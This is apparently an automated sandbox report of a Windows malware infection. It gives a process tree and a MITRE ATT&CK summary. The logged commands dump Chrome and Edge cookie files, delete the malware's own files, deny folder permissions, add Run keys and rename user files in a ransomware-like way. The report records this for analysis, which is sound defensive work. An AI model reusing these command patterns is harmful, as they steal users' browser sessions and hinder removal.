-
C:\Users\Admin\Documents\pd4dwmMKZbvyz6uc8YnXiR2U.exe"C:\Users\Admin\Documents\pd4dwmMKZbvyz6uc8YnXiR2U.exe"2⤵
- Executes dropped EXE
PID:4252 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:6044
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:6136
-
-
-
C:\Users\Admin\Documents\F3OFPDUCFW5c4q2cE6HvnDLg.exe"C:\Users\Admin\Documents\F3OFPDUCFW5c4q2cE6HvnDLg.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2444 -
C:\Users\Admin\Documents\F3OFPDUCFW5c4q2cE6HvnDLg.exe"C:\Users\Admin\Documents\F3OFPDUCFW5c4q2cE6HvnDLg.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:4548
-
-
-
C:\Users\Admin\Documents\TmeGKKVV0BFAyWaPlhdBl8TE.exe"C:\Users\Admin\Documents\TmeGKKVV0BFAyWaPlhdBl8TE.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im TmeGKKVV0BFAyWaPlhdBl8TE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\TmeGKKVV0BFAyWaPlhdBl8TE.exe" & del C:\ProgramData\*.dll & exit3⤵PID:200
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4320
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im TmeGKKVV0BFAyWaPlhdBl8TE.exe /f4⤵
- Kills process with taskkill
PID:5488
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:4432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_1.exesonia_1.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3860 -
C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS8BE99204\sonia_1.exe" -a2⤵
- Executes dropped EXE
PID:3960
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3872 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124
-
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Loads dropped DLL
PID:3448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
PID:5064
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:3336
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1632
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2224
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:5248
-
C:\Users\Admin\AppData\Local\Temp\8374.exeC:\Users\Admin\AppData\Local\Temp\8374.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5320 -
C:\Users\Admin\AppData\Local\Temp\8374.exeC:\Users\Admin\AppData\Local\Temp\8374.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5460 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\bc419848-d722-4661-9b4e-d634a23bf423" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4712
-
-
C:\Users\Admin\AppData\Local\Temp\8374.exe"C:\Users\Admin\AppData\Local\Temp\8374.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
PID:7104 -
C:\Users\Admin\AppData\Local\Temp\8374.exe"C:\Users\Admin\AppData\Local\Temp\8374.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
PID:6336 -
C:\Users\Admin\AppData\Local\3107efb0-4527-425c-83ec-a408d7c4f968\build2.exe"C:\Users\Admin\AppData\Local\3107efb0-4527-425c-83ec-a408d7c4f968\build2.exe"5⤵
- Suspicious use of SetThreadContext
PID:6620 -
C:\Users\Admin\AppData\Local\3107efb0-4527-425c-83ec-a408d7c4f968\build2.exe"C:\Users\Admin\AppData\Local\3107efb0-4527-425c-83ec-a408d7c4f968\build2.exe"6⤵
- Loads dropped DLL
- Checks processor information in registry
PID:6684 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\3107efb0-4527-425c-83ec-a408d7c4f968\build2.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6864
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f8⤵
- Kills process with taskkill
PID:6868
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:6912
-
-
-
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2676
-
C:\Users\Admin\AppData\Local\Temp\8EA1.exeC:\Users\Admin\AppData\Local\Temp\8EA1.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
PID:6000 -
C:\ProgramData\MUW2EEXT892HK8FP.exe"C:\ProgramData\MUW2EEXT892HK8FP.exe"2⤵PID:4216
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8EA1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8EA1.exe" & del C:\ProgramData\*.dll & exit2⤵PID:4132
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8EA1.exe /f3⤵
- Kills process with taskkill
PID:6292
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:6976
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:5240
-
C:\Users\Admin\AppData\Local\Temp\A314.exeC:\Users\Admin\AppData\Local\Temp\A314.exe1⤵
- Adds Run key to start application
PID:5832 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp\A314.exe" /P "Admin:N"2⤵PID:6960
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:7040
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Local\Temp\A314.exe" /P "Admin:N"3⤵PID:7044
-
-
-
C:\Windows\SysWOW64\CACLS.exeCACLS "C:\Users\Admin\AppData\Local\Temp\A314.exe" /P "Admin:R" /E2⤵PID:6648
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|CACLS "C:\Users\Admin\AppData\Local\Temp" /P "Admin:N"2⤵PID:3548
-
C:\Windows\SysWOW64\cacls.exeCACLS "C:\Users\Admin\AppData\Local\Temp" /P "Admin:N"3⤵PID:7084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:7048
-
-
-
C:\Windows\SysWOW64\CACLS.exeCACLS "C:\Users\Admin\AppData\Local\Temp" /P "Admin:R" /E2⤵PID:6792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5832 -s 7122⤵
- Program crash
PID:7108
-
-
C:\Users\Admin\AppData\Local\Temp\AA58.exeC:\Users\Admin\AppData\Local\Temp\AA58.exe1⤵PID:4976
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵
- Executes dropped EXE
PID:5508
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:5452
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt2⤵PID:7044
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6304
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:6288
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:7008
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent1⤵PID:5104
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1